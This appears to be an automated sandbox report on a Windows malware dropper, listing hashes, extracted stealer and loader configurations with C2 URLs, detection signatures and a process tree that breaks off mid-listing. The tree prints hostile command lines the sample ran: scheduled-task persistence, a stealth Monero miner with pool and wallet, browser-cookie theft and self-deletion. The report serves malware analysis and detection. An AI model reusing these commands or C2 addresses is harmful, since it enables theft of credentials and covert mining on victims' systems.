Analysis

  • max time kernel
    9s
  • max time network
    159s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    11-08-2021 10:41

General

  • Target

    7BA00A7F8BF0F2D0237BD01BB12A825B.exe

  • Size

    3.3MB

  • MD5

    7ba00a7f8bf0f2d0237bd01bb12a825b

  • SHA1

    1af2a65956ba61ded056f90ef48e08abb7e4e6b5

  • SHA256

    a80595d5777175cd4da514edb06d38676888daf62608369b816b2f11b6aa9cc2

  • SHA512

    9b99656efbb22c6eb0e3cee3a5949d3f5cbf1e24821b30d3ee33bfcea5a0928cc96a05daf19cbf88041e75030f3168727045bb1630a0ddf2edd6d6465eab761b

Malware Config

Extracted

Family

vidar

Version

39.9

Botnet

706

C2

https://prophefliloc.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

39b871ed120e56ecbdc546b8a8a78c4e5516bc1f

Attributes
  • url4cnc

    https://telete.in/uiopoppiscess

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

40

Botnet

937

C2

https://lenak513.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon Stealer Payload 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1

    suricata: ET MALWARE GCleaner Downloader Activity M1

  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

    suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)

  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

    suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • Nirsoft 2 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7BA00A7F8BF0F2D0237BD01BB12A825B.exe
    "C:\Users\Admin\AppData\Local\Temp\7BA00A7F8BF0F2D0237BD01BB12A825B.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:512
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3512
      • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c zaiqa_1.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4016
          • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_1.exe
            zaiqa_1.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_1.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_1.exe" -a
              6⤵
              • Executes dropped EXE
              PID:4284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c zaiqa_2.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:340
          • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_2.exe
            zaiqa_2.exe
            5⤵
              PID:3860
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c zaiqa_3.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2464
            • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_3.exe
              zaiqa_3.exe
              5⤵
              • Executes dropped EXE
              PID:3424
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c zaiqa_4.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:680
            • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_4.exe
              zaiqa_4.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2712
              • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                6⤵
                • Executes dropped EXE
                PID:4332
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                  7⤵
                    PID:5476
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                      8⤵
                      • Creates scheduled task(s)
                      PID:5184
                  • C:\Users\Admin\AppData\Roaming\services64.exe
                    "C:\Users\Admin\AppData\Roaming\services64.exe"
                    7⤵
                      PID:2408
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                        8⤵
                          PID:7208
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                            9⤵
                            • Creates scheduled task(s)
                            PID:7580
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                          "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                          8⤵
                            PID:7272
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                            8⤵
                              PID:6656
                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                          6⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          PID:4404
                          • C:\Windows\winnetdriv.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1628678701 0
                            7⤵
                            • Executes dropped EXE
                            PID:4548
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c zaiqa_5.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1576
                      • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_5.exe
                        zaiqa_5.exe
                        5⤵
                        • Executes dropped EXE
                        PID:60
                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                          6⤵
                            PID:4408
                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            6⤵
                              PID:3604
                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              6⤵
                                PID:5428
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                6⤵
                                  PID:3880
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c zaiqa_6.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3368
                              • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_6.exe
                                zaiqa_6.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3328
                                • C:\Users\Admin\AppData\Roaming\2757176.exe
                                  "C:\Users\Admin\AppData\Roaming\2757176.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4824
                                • C:\Users\Admin\AppData\Roaming\2006703.exe
                                  "C:\Users\Admin\AppData\Roaming\2006703.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5080
                                • C:\Users\Admin\AppData\Roaming\5156074.exe
                                  "C:\Users\Admin\AppData\Roaming\5156074.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5012
                                • C:\Users\Admin\AppData\Roaming\2478244.exe
                                  "C:\Users\Admin\AppData\Roaming\2478244.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  PID:4932
                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                    7⤵
                                      PID:3988
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c zaiqa_7.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:808
                                • C:\Users\Admin\AppData\Local\Temp\7zS8BD5DC14\zaiqa_7.exe
                                  zaiqa_7.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4124
                                  • C:\Users\Admin\Documents\kAgAoOWP0XP_gK9mhypXti7n.exe
                                    "C:\Users\Admin\Documents\kAgAoOWP0XP_gK9mhypXti7n.exe"
                                    6⤵
                                      PID:3824
                                    • C:\Users\Admin\Documents\2ojibsgrjscOsXxoclP6GycK.exe
                                      "C:\Users\Admin\Documents\2ojibsgrjscOsXxoclP6GycK.exe"
                                      6⤵
                                        PID:3956
                                        • C:\Users\Admin\AppData\Roaming\6020055.exe
                                          "C:\Users\Admin\AppData\Roaming\6020055.exe"
                                          7⤵
                                            PID:4576
                                          • C:\Users\Admin\AppData\Roaming\8724927.exe
                                            "C:\Users\Admin\AppData\Roaming\8724927.exe"
                                            7⤵
                                              PID:3336
                                          • C:\Users\Admin\Documents\zuISnjpgQVDr1cLSNIMFG3QW.exe
                                            "C:\Users\Admin\Documents\zuISnjpgQVDr1cLSNIMFG3QW.exe"
                                            6⤵
                                              PID:2080
                                              • C:\Users\Admin\AppData\Roaming\5741124.exe
                                                "C:\Users\Admin\AppData\Roaming\5741124.exe"
                                                7⤵
                                                  PID:5208
                                                • C:\Users\Admin\AppData\Roaming\4266593.exe
                                                  "C:\Users\Admin\AppData\Roaming\4266593.exe"
                                                  7⤵
                                                    PID:2064
                                                • C:\Users\Admin\Documents\nRXcYubFmX60u0XQe8XjuHzg.exe
                                                  "C:\Users\Admin\Documents\nRXcYubFmX60u0XQe8XjuHzg.exe"
                                                  6⤵
                                                    PID:2664
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      7⤵
                                                        PID:6280
                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                          PID:6920
                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                          7⤵
                                                            PID:6648
                                                        • C:\Users\Admin\Documents\snEVE1n0E5fb2sc11dDZrkLE.exe
                                                          "C:\Users\Admin\Documents\snEVE1n0E5fb2sc11dDZrkLE.exe"
                                                          6⤵
                                                            PID:4396
                                                          • C:\Users\Admin\Documents\HISkP7OhThk3vkuJZlZ3lUDY.exe
                                                            "C:\Users\Admin\Documents\HISkP7OhThk3vkuJZlZ3lUDY.exe"
                                                            6⤵
                                                              PID:4992
                                                              • C:\Users\Admin\Documents\HISkP7OhThk3vkuJZlZ3lUDY.exe
                                                                "C:\Users\Admin\Documents\HISkP7OhThk3vkuJZlZ3lUDY.exe" -q
                                                                7⤵
                                                                  PID:1364
                                                              • C:\Users\Admin\Documents\eIELgSqzigx_qdW7T97qIqge.exe
                                                                "C:\Users\Admin\Documents\eIELgSqzigx_qdW7T97qIqge.exe"
                                                                6⤵
                                                                  PID:4292
                                                                  • C:\Users\Admin\Documents\eIELgSqzigx_qdW7T97qIqge.exe
                                                                    "C:\Users\Admin\Documents\eIELgSqzigx_qdW7T97qIqge.exe"
                                                                    7⤵
                                                                      PID:7420
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                        8⤵
                                                                          PID:7812
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                            9⤵
                                                                              PID:5584
                                                                      • C:\Users\Admin\Documents\DKsfz7JNnvuGJ1lZAPrgw90K.exe
                                                                        "C:\Users\Admin\Documents\DKsfz7JNnvuGJ1lZAPrgw90K.exe"
                                                                        6⤵
                                                                          PID:4788
                                                                        • C:\Users\Admin\Documents\z6VPtimEnBuuqLTJ20NZfocg.exe
                                                                          "C:\Users\Admin\Documents\z6VPtimEnBuuqLTJ20NZfocg.exe"
                                                                          6⤵
                                                                            PID:5640
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\z6VPtimEnBuuqLTJ20NZfocg.exe"
                                                                              7⤵
                                                                                PID:4320
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /T 10 /NOBREAK
                                                                                  8⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:6236
                                                                            • C:\Users\Admin\Documents\IlVcQUinXXu7s4Di2BnF7jQ7.exe
                                                                              "C:\Users\Admin\Documents\IlVcQUinXXu7s4Di2BnF7jQ7.exe"
                                                                              6⤵
                                                                                PID:5564
                                                                              • C:\Users\Admin\Documents\SAZvx0zfIljh4izbfCLmV1yc.exe
                                                                                "C:\Users\Admin\Documents\SAZvx0zfIljh4izbfCLmV1yc.exe"
                                                                                6⤵
                                                                                  PID:5496
                                                                                • C:\Users\Admin\Documents\JO1KwCqEr8rKpDz0oYx4CN9j.exe
                                                                                  "C:\Users\Admin\Documents\JO1KwCqEr8rKpDz0oYx4CN9j.exe"
                                                                                  6⤵
                                                                                    PID:5400
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5400 -s 856
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5188
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5400 -s 880
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5116
                                                                                  • C:\Users\Admin\Documents\aUqDWRuxgw_Gv_ebIgpLZB31.exe
                                                                                    "C:\Users\Admin\Documents\aUqDWRuxgw_Gv_ebIgpLZB31.exe"
                                                                                    6⤵
                                                                                      PID:5300
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im aUqDWRuxgw_Gv_ebIgpLZB31.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\aUqDWRuxgw_Gv_ebIgpLZB31.exe" & del C:\ProgramData\*.dll & exit
                                                                                        7⤵
                                                                                          PID:592
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /im aUqDWRuxgw_Gv_ebIgpLZB31.exe /f
                                                                                            8⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:6860
                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                            timeout /t 6
                                                                                            8⤵
                                                                                            • Delays execution with timeout.exe
                                                                                            PID:4896
                                                                                      • C:\Users\Admin\Documents\0VLe4QYiYC_F0cTbYS6Ok_Yc.exe
                                                                                        "C:\Users\Admin\Documents\0VLe4QYiYC_F0cTbYS6Ok_Yc.exe"
                                                                                        6⤵
                                                                                          PID:5256
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 660
                                                                                            7⤵
                                                                                            • Program crash
                                                                                            PID:4612
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 676
                                                                                            7⤵
                                                                                            • Program crash
                                                                                            PID:5560
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 712
                                                                                            7⤵
                                                                                            • Program crash
                                                                                            PID:4780
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 692
                                                                                            7⤵
                                                                                            • Program crash
                                                                                            PID:5212
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1164
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Program crash
                                                                                            PID:2184
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1140
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Program crash
                                                                                            PID:4960
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1128
                                                                                            7⤵
                                                                                            • Program crash
                                                                                            PID:4544
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1208
                                                                                            7⤵
                                                                                            • Program crash
                                                                                            PID:4660
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "0VLe4QYiYC_F0cTbYS6Ok_Yc.exe" /f & erase "C:\Users\Admin\Documents\0VLe4QYiYC_F0cTbYS6Ok_Yc.exe" & exit
                                                                                            7⤵
                                                                                              PID:5336
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /im "0VLe4QYiYC_F0cTbYS6Ok_Yc.exe" /f
                                                                                                8⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:4172
                                                                                          • C:\Users\Admin\Documents\Kw386lWyPXcTtOmABeq6Lb1Z.exe
                                                                                            "C:\Users\Admin\Documents\Kw386lWyPXcTtOmABeq6Lb1Z.exe"
                                                                                            6⤵
                                                                                              PID:5212
                                                                                              • C:\Users\Admin\Documents\Kw386lWyPXcTtOmABeq6Lb1Z.exe
                                                                                                C:\Users\Admin\Documents\Kw386lWyPXcTtOmABeq6Lb1Z.exe
                                                                                                7⤵
                                                                                                  PID:4656
                                                                                              • C:\Users\Admin\Documents\2Dui8VJDwFWXVfTEyTCnYi4q.exe
                                                                                                "C:\Users\Admin\Documents\2Dui8VJDwFWXVfTEyTCnYi4q.exe"
                                                                                                6⤵
                                                                                                  PID:5136
                                                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                    7⤵
                                                                                                      PID:5416
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                          PID:6360
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                          8⤵
                                                                                                            PID:6396
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                            8⤵
                                                                                                              PID:7068
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                              8⤵
                                                                                                                PID:7088
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                8⤵
                                                                                                                  PID:1204
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                  8⤵
                                                                                                                    PID:6372
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    8⤵
                                                                                                                      PID:1456
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                      8⤵
                                                                                                                        PID:6916
                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                      7⤵
                                                                                                                        PID:5192
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          8⤵
                                                                                                                            PID:5028
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                              PID:7016
                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5736
                                                                                                                          • C:\Users\Admin\Documents\Qo1xnkE0E7xQ33KOz9bX66U8.exe
                                                                                                                            "C:\Users\Admin\Documents\Qo1xnkE0E7xQ33KOz9bX66U8.exe"
                                                                                                                            6⤵
                                                                                                                              PID:5940
                                                                                                                            • C:\Users\Admin\Documents\mD0QhcxX9ML9_PKQzaiFIuyL.exe
                                                                                                                              "C:\Users\Admin\Documents\mD0QhcxX9ML9_PKQzaiFIuyL.exe"
                                                                                                                              6⤵
                                                                                                                                PID:3980
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-GMVU9.tmp\mD0QhcxX9ML9_PKQzaiFIuyL.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-GMVU9.tmp\mD0QhcxX9ML9_PKQzaiFIuyL.tmp" /SL5="$501D8,138429,56832,C:\Users\Admin\Documents\mD0QhcxX9ML9_PKQzaiFIuyL.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:5796
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-6PGRS.tmp\Setup.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-6PGRS.tmp\Setup.exe" /Verysilent
                                                                                                                                      8⤵
                                                                                                                                        PID:644
                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe
                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                                                                          9⤵
                                                                                                                                            PID:6908
                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628419426 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                                                                              10⤵
                                                                                                                                                PID:6964
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                              9⤵
                                                                                                                                                PID:5604
                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
